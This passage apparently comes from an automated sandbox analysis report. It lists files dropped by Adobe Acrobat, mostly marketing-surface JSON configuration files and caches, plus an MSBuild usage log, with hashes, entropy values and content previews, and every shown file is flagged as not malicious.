Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.380715996457281
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJM3g98kUwPeUkwRe9:YvXKXEzDGLNsdTeOSZGMbLUkee9
MD5:	DC16B2D7E018144573A7A5B6ADA4E15A
SHA1:	B8989E2CBD924FCBBAD9D6E16AA1BCB89D1FDB96
SHA-256:	BD8ACD5054A984C36FB94C53CD866C27B47387D9A8BAC53D3E94CD849C5A7CF4
SHA-512:	CA25785DB4E0AD58D6B47F491AFF3ADE45EC03EE51FB6BAD517A23286102F732B7B814E4B60A773C4A1410B3E368966E9AEBC692466E0F06A6B5E67FE482C266
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.3163785934488015
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJfBoTfXpnrPeUkwRe9:YvXKXEzDGLNsdTeOSZGWTfXcUkee9
MD5:	3A52F6B875F4DA15E7262E1EB2A686EA
SHA1:	ADF82572E5DA3C00EE246010CF58C945905E5A68
SHA-256:	09C6DF7A27B6FF317E17A224DFDFE00A9EA07C628C3E56A9B944C38D35398B36
SHA-512:	9F11073AFF0D71641D19EA3863F2FD7B4F852A37E764AA7389E27C519AC5634CB77AA3F1F91882B804452ECF06E07706D8B91EC12A4288DBA993CFD1E333E355
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.294926909974806
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJfBD2G6UpnrPeUkwRe9:YvXKXEzDGLNsdTeOSZGR22cUkee9
MD5:	4B4F7B4335DB4A82AB5182FE3D8F9487
SHA1:	2FA18D2D47984A9A4EEF47D041C22C71D8B18109
SHA-256:	E321973360606A9DA3D3059438F9B675F2CBF68C3C46AEEC2236BE0BA214B5F5
SHA-512:	510D0D0A91319E0878AD6E88758D5E8F89708044B5B9943B2EC5737616722527EA9C735F5F5385671F0A11D0D426C474D3A06A0A562208A0F2BC9BDD2821F603
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.368203163125783
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJfPmwrPeUkwRe9:YvXKXEzDGLNsdTeOSZGH56Ukee9
MD5:	B6F4E8CEEC8B1BFC962441B8547F43BC
SHA1:	B71013DDF016AC3E6D0129AE97AD1744BEB0D528
SHA-256:	223A4E45B26B78341DA3675C2CEC82E33F4CD2C09FB5217B64293C524108498D
SHA-512:	BA0D9B5DFA7CD3D61FFF41782D8790C8D8D3EF08A8CDD6BF51CD41A1C461806014FA320E234EC634A2561B130B99E30DEB7A9141039970BC861DD129216B0AC3
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.682698307286983
Encrypted:	false
SSDEEP:	24:Yv6XoDGNmeOS+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSUB:YvB3eUhgy6SAFv5Ah8cv/UB
MD5:	8C2D6D9311A026CD6E37D0846118E893
SHA1:	7BA6C243BFA7F21C3B4CE8B9C8F2D70A53A661A4
SHA-256:	9C22A76E70A33007A5F6180B024AB47D7F5229FC23955977D22B1F00379E760D
SHA-512:	B2231C8E61933D5209D5A4CF83FD93BA150142D23D19F46A0D1269C0A7E1B85B14AFF4618C7986908C0BA16879FB87AF09267AE7EFF62FBCA422E0DF1E6EF507
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.302915139578263
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJf8dPeUkwRe9:YvXKXEzDGLNsdTeOSZGU8Ukee9
MD5:	479F21D8783B0F1D0702ED72EA8CA14C
SHA1:	DDF7F1E93958F55B38937C3EDF231082ABD4F8C1
SHA-256:	F83A7B55D71F5BF8CE05976839BE9B2AA62D0E36B63563418CB49665086B8432
SHA-512:	03D250C8F926264F785DB4E7B6303B83A56C72A26A03B6B165DA296E3A9F499FFDF1E3EB0A628080581103F8C41C405839F3A7D545D5961618AF81A89A80C3B2
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.307076624533815
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJfQ1rPeUkwRe9:YvXKXEzDGLNsdTeOSZGY16Ukee9
MD5:	C2756432834040AC9712EC56B61229E5
SHA1:	E18D525254BF5315E7FFCB7ED3962FD370AFA342
SHA-256:	021BD5778EBC273602CA6C1EDD25B693219CBBE9E3A3779DAAD28700A79608C8
SHA-512:	CDA876C39F8B2332E6034FCE9D6B8516B67AF7E2933FE1752778CC31FE133B77BFC1965557C0C4786B0866E03BA328AC1EF362E01654509431DB4F4543638B62
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.3223763446375685
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJfFldPeUkwRe9:YvXKXEzDGLNsdTeOSZGz8Ukee9
MD5:	57F919CC674169C9B0518389E24BD356
SHA1:	7D7C6C2F3CDFC0FE4A7A1E5B724E1159AA99B623
SHA-256:	5AF3963FE56FF91D68CF92D799960304D9D6C0FA54EAB5783C844ADBE8D4DAA3
SHA-512:	421C2774B9AF7FC72D8200CE3660B8524E44300B3C831EF3A3ED03D27678C0C4A5761C014B791C80A690BAB8FFE79F992FCFDEA999EBEFE0FC0336A988874485
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.328716069956629
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJfzdPeUkwRe9:YvXKXEzDGLNsdTeOSZGb8Ukee9
MD5:	FAABDB78B0C30FA615A927688CAE9B79
SHA1:	6A99DFF9DAE69A92DE4CBD224245CACA538371D6
SHA-256:	8A49D1EB9E1F5E628A1601BB0B3F7145648508B5503C18CB1D6D3982E0390D71
SHA-512:	5EA81781B52FCAAA277266E12421081E464D135EAECC4E5882036CE00651F530F4896E2C3C3646D0F1D4D7C34EF65D10B855BD2B1516E7E1A30F76187C8C1F74
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.309831458747579
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJfYdPeUkwRe9:YvXKXEzDGLNsdTeOSZGg8Ukee9
MD5:	1DD8BA8B87D2BD6D91C7F6BD43B97DF2
SHA1:	44918A960E5FF7E558504D9B189726A64B53A7BB
SHA-256:	632DCD08505B1DB9FC3361C084E8783EC4CA5E39ABC07ACBD8E3CAA10654295F
SHA-512:	FC4A48BEDC780D2F898F6069CF9447C1ED91DD981A37D6C5C45966A389C6A2EBCE4490535D09F6782EC68C638823D2726FB9F35095B48C3B82EAB114CB8E4EB3
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.2963539115605505
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJf+dPeUkwRe9:YvXKXEzDGLNsdTeOSZG28Ukee9
MD5:	6D9B3C41E08374FD9C7D7301FE2D1A4E
SHA1:	2172F86DF7E7C954C45FA067F922024FFB92F493
SHA-256:	3B670CFBFDA5CB5AC8702E0512D1582DE92203F0D0FF8917ED8D8EB42B65ACC4
SHA-512:	CE99FFFDBC24078C4B625F4F053662CD14A745A191A88D19C332F889FD7FCBFB9EB198F9CA39498EA33BA3895F0C72F2F03C1E7257268A8467393603D838DCA8
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.293310986258229
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJfbPtdPeUkwRe9:YvXKXEzDGLNsdTeOSZGDV8Ukee9
MD5:	484C8CEE7B6A1AE79EB136C54DF14CAD
SHA1:	D5FDCF2C7914C4BD328A47CB37051B27A868AB3B
SHA-256:	D9350D4C63B602EF7408756483BBE4A50934D2CFE89E74557EB4495EB6D72DFF
SHA-512:	2D26BA435D7268C59618A434236B943B0A961386159C96460DA5C13FDA6D33719E94BC56821E54234D524ADCDDDAB1BAB5089511C1AC39F47DE13CE24977D26C
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.29839438655225
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJf21rPeUkwRe9:YvXKXEzDGLNsdTeOSZG+16Ukee9
MD5:	0FEEEC31D4BFAFE20D4A54DC9218564A
SHA1:	8D0EAA8FB2AB0CE95A34AF1ABCB6B71F04FDCE75
SHA-256:	D77BC5230E7044D20B51254D31A512DDBD65D6BE8E99CDCE45ACB775B12B998F
SHA-512:	789B4248027E133AD43B430608174B24A99DF07DDBF559949FEDE6AE9F23AF3F20F77E29C101709592AC148548012280D1D041AF1F60D9CC7C1FB8C7EF9455D5
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.657408863369519
Encrypted:	false
SSDEEP:	24:Yv6XoDGNmeOSiamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSUB:YvB3eWBgkDMUJUAh8cvMUB
MD5:	C52748624F8E388B1D415D060A477B04
SHA1:	0F23D9F075883D940226518D7B65836E0D5ABF48
SHA-256:	17ABC3E1202C58530F1080A59B139FA29DC33576EAE803625AF37051D8A4152B
SHA-512:	68D005375F853A84CD9F61F5AE508C9D4EAD72A1907B1D00AD73F86B6DAA9CE45665BF7450FF44A99DEA9B9DECFBBEC80781A7D701C96B7FA5FDAE9F95C6C79E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.273774482227854
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJfshHHrPeUkwRe9:YvXKXEzDGLNsdTeOSZGUUUkee9
MD5:	F613F6A7B82BAC5C74B8EE7AF7A5534F
SHA1:	E7E1AAF39BE08C229DC728548A4ABF076447ED46
SHA-256:	6F45CBCDB8C5C28351CA94724D71CAF54F7B0A7CA2B8007C64768B9C0CDD6001
SHA-512:	21022F4162B29D8BC4C6CAAD9027455C98D79855ECB6EDD3CAE89526CB34E4C44341AC5A15A9368DA6A1D8A99B7369C9FB6850AC3E9799565B9D96FA588F58D3
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.293021229426774
Encrypted:	false
SSDEEP:	6:YEQXJ2HXEzDGdSE1n4WsGiIPEeOF0YyjeoAvJTqgFCrPeUkwRe9:YvXKXEzDGLNsdTeOSZGTq16Ukee9
MD5:	951AC8A66DCECD23EE087737E933A3CD
SHA1:	F64738010E28521D3B7FF0C241E581364E0395CB
SHA-256:	5ABE4D4E351A16D0CDA8D919FED8A351437FEEF7CD0F70C14AB1F725A5CC9A16
SHA-512:	09568B156D3C75CFC7A657135443F0F5AA43550CF3A8F9998E061608C869E3D52A16F981AA93AF0AE905B3FECDD2D39644EAA3AAC80E07A5C8AD7DE3E0448056
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"b4805519-fda4-49cb-be26-ac9713de21a9","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734596660108,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.141334459390264
Encrypted:	false
SSDEEP:	48:YsjVzPjVjrVBVZdrlKGVu5RVwocV5Vr5tIMVGVS8cPKVhuNVJpMAV83kVEHeh9oj:zpVjBjZdUC0zwokLr5iUC5cmMJpMwMci
MD5:	05C701B3CCAA7F8157354552D9FA71E8
SHA1:	62B87FDF1B01025C1987B7A1951F59F8C3C568EA
SHA-256:	6FEE94BB87222E6BDAFFA223D1BC8F578AA83271CE9E2B6FAD982C3BCE3604A7
SHA-512:	97F7150A62A4548F2E93441831F5A219BE8AE9E67EB7B6078D4CC22AE1010EE8EFD3C1DF2DEE77726107EE1CF2A56B938EE3A0A05B124A5C1E76B2D7E0186D1F
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"4d8b105fb471b76057728c44989a2185","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734426510000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"e119c52ac024022f3d05639875660fe4","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734426510000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"76b71d67b931dbf71385b55da2c5288f","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734426510000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"64ebfb9cec66d4d651fb95834e33999a","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734426510000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"61adfba95210d4a727596a3d1d342a4b","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734426510000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"9c106e14de99f45cb68fae57c831f06b","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.4525284679205597
Encrypted:	false
SSDEEP:	48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsmTlE/:lNVmsw3SHtbDbPe0K3+fDZdE
MD5:	E0D6D0C45F478E96E9FE0702CE104736
SHA1:	F28F3193BE77D4A5C25BE590680C16B71AFA0158
SHA-256:	57B8AB49B5EE7C67FE7D32DCC0B3D98BB3A5979545597CE93698A69E7C8EBA0E
SHA-512:	F90CCC1953CBAEF684400EBF7B52C9FA600DC537692E195E1169EA237C1F4D1715EBFD02BF07C37132CB68DB060BD28D2C5FAE9847DD3F95ECC43447EA41C55B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.9566003811518573
Encrypted:	false
SSDEEP:	48:7MErvrBd6dHtbGIbPe0K3+fDy2dsmSRqFl2GL7msq:7x3SHtbDbPe0K3+fDZdSKVmsq
MD5:	A6D3867F8F814C0260031AAB5845FD37
SHA1:	71646ECC4118F38C22B332382B9DF07484357817
SHA-256:	A09AF291E71A9F1CCFA529C8D0E7BFBB7CA8BD1E223BA112A7FB1E8ECD25E069
SHA-512:	E6B382C4E9301473B999681DD46C246C4B46D4DB09E1101DF268CED2409BB5B2DED635AD208C59D20D4FA9353EAB3EF6E04CF95DD6C022DB5A7BCAE0EBD5B057
Malicious:	false
Preview:	.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgzafVRzOCXEvrJuiuaTp2ciclhYyu:6a6TZ44ADEzafVNOUurkci2K
MD5:	C995C70B614123EFB11D562D36806AAF
SHA1:	829B82BC38BD5CD215FA6BD7C4B57413B72F7392
SHA-256:	7F3539A9EDBC04F76EC45564A5F0734C9D853F85CD9F3E602124E8CA55039376
SHA-512:	3AE6D6C1954019F5422A5194CBB05872F758CF19F1B776DA67C203B38A81BFF684F5320F0C7C632CB776D081086D555990C45A98206F152CCF7F39B0ACCECFA1
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
